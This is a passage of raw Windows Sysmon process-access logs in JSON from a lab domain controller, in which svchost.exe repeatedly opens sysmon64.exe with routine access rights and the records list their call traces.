05:46:49.828","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2050,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.828\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.828","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2051,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.828\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.828","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2052,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.828\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.828","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2053,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.828\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.828","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2054,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.828\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.828","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2055,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.828\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.828","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2056,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.828\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.828","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2057,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.828\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 